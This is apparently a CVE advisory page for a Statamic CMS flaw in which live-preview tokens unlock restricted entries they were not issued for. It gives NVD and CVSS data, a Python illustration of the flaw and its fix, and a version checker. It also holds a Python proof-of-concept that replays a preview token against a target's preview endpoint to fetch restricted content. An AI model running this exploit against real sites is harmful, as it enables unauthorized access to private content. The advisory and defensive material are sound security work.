Security Vulnerability Report
CVE-2026-33884 CVSS 4.3 MEDIUM

CVE-2026-33884

Published: 2026-03-27 21:17:25
Last Modified: 2026-04-08 14:17:44

Description

Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, an authenticated Control Panel user with access to live preview could use a live preview token to access restricted content that the token was not intended for. This has been fixed in 5.73.16 and 6.7.2.
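The weakness NVD assigns here is CWE-863 (Incorrect Authorization): the preview handler verified that a live preview token existed, but not that it had been minted for the entry being requested. The block below is an added illustration of that pattern and its fix, not Statamic code; the entry data, the in-memory token store, the permission model and the two handler functions are all constructed for the example, and the exact check Statamic added in 5.73.16 / 6.7.2 is not reproduced here.

```python
"""CWE-863 pattern behind CVE-2026-33884, modelled in plain Python.

A live-preview token is a bearer credential: whoever presents it gets the
rendered (possibly unpublished) entry.  The vulnerable handler only asks
"is this token valid?"; the fixed handler also asks "was this token issued
for the entry being requested?".  Everything below is constructed for the
example and is not Statamic's code.
"""
import secrets
import time

# Constructed sample content.  'secret-article' is restricted to the admin
# user; 'public-post' is viewable by every Control Panel user.
ENTRIES = {
    "public-post": {"content": "<h1>Hello</h1>", "restricted_to": None},
    "secret-article": {"content": "<h1>Q3 layoffs</h1>", "restricted_to": {"admin"}},
}


def user_may_view(user_id, entry_id):
    allowed = ENTRIES[entry_id]["restricted_to"]
    return allowed is None or user_id in allowed


class PreviewTokenStore:
    """In-memory stand-in for wherever a CMS keeps preview tokens (assumed)."""
    TTL = 3600  # seconds a token stays valid

    def __init__(self):
        self._tokens = {}

    def issue(self, user_id, entry_id):
        # Only a user who can already see the entry can mint a token for it.
        if not user_may_view(user_id, entry_id):
            raise PermissionError(f"{user_id} cannot preview {entry_id}")
        token = secrets.token_urlsafe(32)
        self._tokens[token] = {"entry_id": entry_id, "user_id": user_id,
                               "expires": time.time() + self.TTL}
        return token

    def lookup(self, token):
        rec = self._tokens.get(token)
        if rec is None or rec["expires"] < time.time():
            return None
        return rec


def preview_vulnerable(store, token, entry_id):
    """Incomplete authorization: any live token unlocks any entry."""
    if store.lookup(token) is None:
        return 403, ""
    if entry_id not in ENTRIES:
        return 404, ""
    return 200, ENTRIES[entry_id]["content"]


def preview_fixed(store, token, entry_id):
    """Bind the token to the entry it was minted for."""
    rec = store.lookup(token)
    if rec is None:
        return 403, ""
    # The decisive check: the token must have been issued for *this* entry.
    if rec["entry_id"] != entry_id:
        return 403, ""
    # Re-check the issuing user's rights at render time so a token outlives
    # neither a permission change nor the entry itself.
    if entry_id not in ENTRIES:
        return 404, ""
    if not user_may_view(rec["user_id"], entry_id):
        return 403, ""
    return 200, ENTRIES[entry_id]["content"]


def demo():
    """Status codes an 'editor' gets when replaying a public-post token
    against the restricted entry, under each handler."""
    store = PreviewTokenStore()
    token = store.issue("editor", "public-post")  # legitimately obtained
    return {
        "vulnerable": preview_vulnerable(store, token, "secret-article")[0],
        "fixed": preview_fixed(store, token, "secret-article")[0],
        "fixed_intended": preview_fixed(store, token, "public-post")[0],
    }


if __name__ == "__main__":
    print(demo())  # {'vulnerable': 200, 'fixed': 403, 'fixed_intended': 200}
```

The point of `preview_fixed` is that token validity and entry authorization are two separate questions; checking only the first is exactly the CWE-863 shape, and the mismatch test has to run before any "does the entry exist" lookup so that a bad token cannot be used to enumerate entry IDs via 404-vs-403 differences.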

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
(network-reachable, low complexity, low privileges required, i.e. an authenticated Control Panel user; no user interaction; scope unchanged; low confidentiality impact, no integrity or availability impact. Exploitability subscore 2.8, impact subscore 1.4.)
Weakness
CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* (versionEndExcluding 5.73.16) - VULNERABLE
cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* (versionStartIncluding 6.0.0, versionEndExcluding 6.7.2) - VULNERABLE
Statamic CMS < 5.73.16
Statamic CMS >= 6.0.0 and < 6.7.2
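The two ranges are easy to misread: every release below 5.73.16 is affected, while on the 6.x line only 6.0.0 up to (but excluding) 6.7.2 is. The following is an added example, not a tool shipped by the project, that encodes the NVD ranges from this page and checks the version pinned in a composer.lock; the package name statamic/cms is taken from the advisory URL's repository, and the sample lock file is constructed.

```python
"""Is an installed Statamic version inside the CVE-2026-33884 ranges?

Ranges mirror the NVD configuration on this page: versionEndExcluding
5.73.16, and versionStartIncluding 6.0.0 with versionEndExcluding 6.7.2.
Added example; not part of the advisory or of Statamic.
"""
import json
import re

# (start inclusive or None, end exclusive), from the CPE match data.
AFFECTED_RANGES = [
    (None, "5.73.16"),
    ("6.0.0", "6.7.2"),
]
PACKAGE = "statamic/cms"  # Composer package name, per the advisory's repository


def parse_version(text):
    """'v5.73.15' -> (5, 73, 15).  A pre-release suffix such as '-beta.1'
    is dropped, so a pre-release of a fixed version is reported as fixed;
    treat that as a conservative limitation, not a guarantee."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version):
    v = parse_version(version)
    for start, end in AFFECTED_RANGES:
        above_start = start is None or v >= parse_version(start)
        if above_start and v < parse_version(end):
            return True
    return False


def check_composer_lock(lock_text):
    """Return (installed_version, affected) for statamic/cms, or
    (None, None) when the package is not present in the lock file."""
    lock = json.loads(lock_text)
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name") == PACKAGE:
                version = pkg["version"]
                return version, is_affected(version)
    return None, None


# Constructed sample: the shape of a composer.lock, trimmed to two packages.
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "laravel/framework", "version": "v11.30.0"},
        {"name": "statamic/cms", "version": "v5.73.15"},
    ],
    "packages-dev": [],
})

if __name__ == "__main__":
    print(check_composer_lock(SAMPLE_LOCK))  # ('v5.73.15', True)
```

Run it against the real lock file with `check_composer_lock(open("composer.lock").read())`; a 5.74.x or 5.80.x install is reported as not affected, which is correct for these ranges, since the 5.x fix landed in 5.73.16 and later 5.x releases carry it.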

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def exploit_statamic_preview(target_url, session_cookie, preview_token, restricted_entry_id):
    """
    Conceptual PoC for CVE-2026-33884.
    Demonstrates accessing restricted content using a live preview token
    that was issued for a different, permitted entry.
    """
    # The endpoint might vary depending on Statamic configuration.
    preview_endpoint = f"{target_url}/!/preview"

    headers = {
        "User-Agent": "Mozilla/5.0 (PoC-Scanner)",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    }
    # Low-privileged Control Panel session; the cookie name is site-specific.
    cookies = {"statamic_session": session_cookie}

    # The vulnerability lies in the server not strictly validating that the
    # token belongs to the requested entry ID.
    params = {
        "token": preview_token,
        "slug": restricted_entry_id,  # or 'id' depending on route definition
    }

    try:
        print(f"[*] Attempting to access restricted entry ID: {restricted_entry_id}")
        response = requests.get(
            preview_endpoint, headers=headers, cookies=cookies, params=params, timeout=15
        )

        if response.status_code == 200:
            print("[+] Request successful. Content potentially leaked.")
            # A 200 alone is not proof: confirm the body carries the restricted
            # entry's content, and that the same request is refused after
            # upgrading to 5.73.16 / 6.7.2.
            if len(response.text) > 100:
                print("[+] Preview content retrieved:")
                print(response.text[:500])  # Print first 500 chars
            else:
                print("[-] Response body seems empty.")
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            print(response.text)
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Configuration
    TARGET = "http://vulnerable-statamic-site.local"
    # Low-privileged user session
    SESSION = "attacker_session_cookie_here"
    # A valid preview token obtained from any previewable content
    TOKEN = "valid_preview_token_here"
    # Target entry ID that should be restricted
    RESTRICTED_ID = "secret-article-123"

    exploit_statamic_preview(TARGET, SESSION, TOKEN, RESTRICTED_ID)

References

https://github.com/statamic/cms/security/advisories/GHSA-8vwx-ccf6-5wg2 (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33884", "sourceIdentifier": "[email protected]", "published": "2026-03-27T21:17:25.183", "lastModified": "2026-04-08T14:17:43.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, an authenticated Control Panel user with access to live preview could use a live preview token to access restricted content that the token was not intended for. This has been fixed in 5.73.16 and 6.7.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.73.16", "matchCriteriaId": "EACDC143-742E-4926-9C28-6095690EB549"}, {"vulnerable": true, "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.7.2", "matchCriteriaId": "631FF065-0872-4DC7-AB25-AB74B782A9BE"}]}]}], "references": [{"url": "https://github.com/statamic/cms/security/advisories/GHSA-8vwx-ccf6-5wg2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}